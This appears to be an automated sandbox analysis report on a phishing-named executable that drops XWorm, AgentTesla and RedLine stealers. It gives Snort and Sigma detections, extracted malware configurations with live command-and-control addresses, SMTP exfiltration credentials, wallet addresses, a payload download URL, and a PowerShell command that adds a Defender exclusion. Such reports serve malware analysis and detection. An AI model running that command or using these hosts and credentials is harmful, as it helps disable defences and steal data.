Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 6648, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', ProcessId: 6192, ProcessName: powershell.exe

Snort Signatures

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes - Source IP: 195.10.205.94 - Destination IP: 192.168.2.4

Timestamp:	06/29/24-10:02:21.884350
SID:	2852870
Source Port:	7725
Destination Port:	49735
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - savePlugin Inbound - Source IP: 195.10.205.94 - Destination IP: 192.168.2.4

Timestamp:	06/29/24-10:02:19.175598
SID:	2853191
Source Port:	7725
Destination Port:	49735
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 209.90.234.57

Timestamp:	06/29/24-10:02:27.411951
SID:	2043231
Source Port:	49744
Destination Port:	1913
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 209.90.234.57 - Destination IP: 192.168.2.4

Timestamp:	06/29/24-10:02:20.542353
SID:	2043234
Source Port:	1913
Destination Port:	49744
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 209.90.234.57 - Destination IP: 192.168.2.4

Timestamp:	06/29/24-10:02:25.769086
SID:	2046056
Source Port:	1913
Destination Port:	49744
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.4 - Destination IP: 209.90.234.57

Timestamp:	06/29/24-10:02:20.378795
SID:	2046045
Source Port:	49744
Destination Port:	1913
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - sendPlugin Outbound - Source IP: 192.168.2.4 - Destination IP: 195.10.205.94

Timestamp:	06/29/24-10:02:18.982376
SID:	2853192
Source Port:	49735
Destination Port:	7725
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 - Source IP: 195.10.205.94 - Destination IP: 192.168.2.4

Timestamp:	06/29/24-10:02:21.884350
SID:	2852874
Source Port:	7725
Destination Port:	49735
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000003.00000002.1948750396.0000000002961000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["195.10.205.94"], "Port": "7725", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: 3.2.RegSvcs.exe.7330000.1.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
Source: 3.2.RegSvcs.exe.7ab0000.3.raw.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["209.90.234.57:1913"], "Bot Id": "foz", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Multi AV Scanner detection for domain / URL

Source: csg-app.com

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\ORDERDATASHEET#PO8738763.scr.exe

ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Source: ORDERDATASHEET#PO8738763.scr.exe	ReversingLabs: Detection: 39%
Source: ORDERDATASHEET#PO8738763.scr.exe	Virustotal: Detection: 21%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 3.2.RegSvcs.exe.400000.0.unpack	String decryptor: 195.10.205.94
Source: 3.2.RegSvcs.exe.400000.0.unpack	String decryptor: 7725
Source: 3.2.RegSvcs.exe.400000.0.unpack	String decryptor: <123456789>
Source: 3.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Xwormmm>
Source: 3.2.RegSvcs.exe.400000.0.unpack	String decryptor: XWorm V5.6
Source: 3.2.RegSvcs.exe.400000.0.unpack	String decryptor: USB.exe
Source: 3.2.RegSvcs.exe.400000.0.unpack	String decryptor: %AppData%
Source: 3.2.RegSvcs.exe.400000.0.unpack	String decryptor: XClient.exe
Source: 3.2.RegSvcs.exe.400000.0.unpack	String decryptor: 1FEsZzSLJGmqvkmbe6jQepyaxXsos8sFHR
Source: 3.2.RegSvcs.exe.400000.0.unpack	String decryptor: 0x99de845515f12D013c5955f80a16e13Eda3DF357
Source: 3.2.RegSvcs.exe.400000.0.unpack	String decryptor: TRC20_Address

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D3EDA4 CryptUnprotectData,		3_2_06D3EDA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D3F5A8 CryptUnprotectData,		3_2_06D3F5A8

Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.154.156.233:443 -> 192.168.2.4:49741 version: TLS 1.2

Source: ORDERDATASHEET#PO8738763.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: RegSvcs.pdb, source: XClient.exe, 00000010.00000000.1930674141.0000000000D12000.00000002.00000001.01000000.00000008.sdmp, XClient.exe.3.dr
Source:	Binary string: RegSvcs.pdb source: XClient.exe, 00000010.00000000.1930674141.0000000000D12000.00000002.00000001.01000000.00000008.sdmp, XClient.exe.3.dr

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 4x nop then push rbx	0_2_00007FF7BD67DD30
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF7BD67DD30
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 4x nop then push rbx	0_2_00007FF7BD67DD30
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 4x nop then push rbx	0_2_00007FF7BD67DD30
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 4x nop then push rbx	0_2_00007FF7BD67DD30
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 4x nop then push rbx	0_2_00007FF7BD67DD30
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 4x nop then push rbx	0_2_00007FF7BD67DD30
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF7BD67DD30
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 4x nop then push rsi	0_2_00007FF7BD67DD30
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 4x nop then push rdi	0_2_00007FF7BD67DD30
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 4x nop then push rdi	0_2_00007FF7BD6B3D20
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 4x nop then push r14	0_2_00007FF7BD72D7E0
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 4x nop then push rbx	0_2_00007FF7BD5F1C50
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 4x nop then push rbx	0_2_00007FF7BD5F1C50

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2853192 ETPRO TROJAN Win32/XWorm V3 CnC Command - sendPlugin Outbound 192.168.2.4:49735 -> 195.10.205.94:7725
Source: Traffic	Snort IDS: 2853191 ETPRO TROJAN Win32/XWorm V3 CnC Command - savePlugin Inbound 195.10.205.94:7725 -> 192.168.2.4:49735
Source: Traffic	Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49744 -> 209.90.234.57:1913
Source: Traffic	Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49744 -> 209.90.234.57:1913
Source: Traffic	Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 209.90.234.57:1913 -> 192.168.2.4:49744
Source: Traffic	Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 195.10.205.94:7725 -> 192.168.2.4:49735
Source: Traffic	Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 195.10.205.94:7725 -> 192.168.2.4:49735
Source: Traffic	Snort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 209.90.234.57:1913 -> 192.168.2.4:49744

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 195.10.205.94
Source: Malware configuration extractor	URLs: 209.90.234.57:1913

Yara detected Generic Downloader

Source: Yara match	File source: 3.2.RegSvcs.exe.7330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic	TCP traffic: 192.168.2.4:49735 -> 195.10.205.94:7725
Source: global traffic	TCP traffic: 192.168.2.4:49744 -> 209.90.234.57:1913
Source: global traffic	TCP traffic: 192.168.2.4:49745 -> 51.195.88.199:587

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: Joe Sandbox View	ASN Name: SERVERHOSH-AS-APServerhoshInternetServiceNL SERVERHOSH-AS-APServerhoshInternetServiceNL
Source: Joe Sandbox View	ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View	ASN Name: TSSCOM-ASRU TSSCOM-ASRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: ip-api.com

Source: global traffic

TCP traffic: 192.168.2.4:49745 -> 51.195.88.199:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /yak/build.exe HTTP/1.1User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1Host: csg-app.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /yak/build.exe HTTP/1.1User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1Host: csg-app.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57
Source: unknown	TCP traffic detected without corresponding DNS query: 209.90.234.57

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /yak/build.exe HTTP/1.1User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1Host: csg-app.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /yak/build.exe HTTP/1.1User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1Host: csg-app.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: csg-app.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: s82.gocheapweb.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 29 Jun 2024 08:02:20 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 24 Aug 2022 20:15:38 GMTAccept-Ranges: bytesContent-Length: 746Vary: Accept-EncodingContent-Type: text/htmlSet-Cookie: visid_incap_2798692=uicdpyIFT7anq9DPVKqwyoq/f2YAAAAAQUIPAAAAAACWKhBwLu2FqJnR9xvRs4Sz; expires=Sun, 29 Jun 2025 07:14:13 GMT; HttpOnly; path=/; Domain=.csg-app.comSet-Cookie: incap_ses_183_2798692=gxd9X/DKeW5G6tgVnyWKAou/f2YAAAAAl1RXJ9jmCpDbeZf/GbfIaw==; path=/; Domain=.csg-app.comX-CDN: ImpervaX-Iinfo: 16-27947529-27947533 NNNN CT(83 87 0) RT(1719648139346 217) q(0 0 2 0) r(3 3) U11

Source: powershell.exe, 0000000B.00000002.1817419759.00000000075F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000004.00000002.1693763957.00000000032F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microC
Source: powershell.exe, 00000009.00000002.1771055969.0000000007CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000004.00000002.1698819188.00000000078F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mih
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://csg-app.com
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://csg-app.com/yak/build.exe
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: RegSvcs.exe, 00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.00000000029E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000004.00000002.1696914668.0000000005E6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725374615.0000000005FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1762039748.000000000542A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1808922395.0000000005B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.1789776531.0000000004C36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: RegSvcs.exe, 00000003.00000002.1990031918.0000000007749000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1977732940.0000000006403000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1990031918.000000000773F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0
Source: RegSvcs.exe, 00000003.00000002.1990031918.0000000007749000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1977732940.0000000006403000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1990031918.000000000773F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: powershell.exe, 00000004.00000002.1694419298.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1717816114.00000000050E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1750061142.0000000004516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1789776531.0000000004C36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
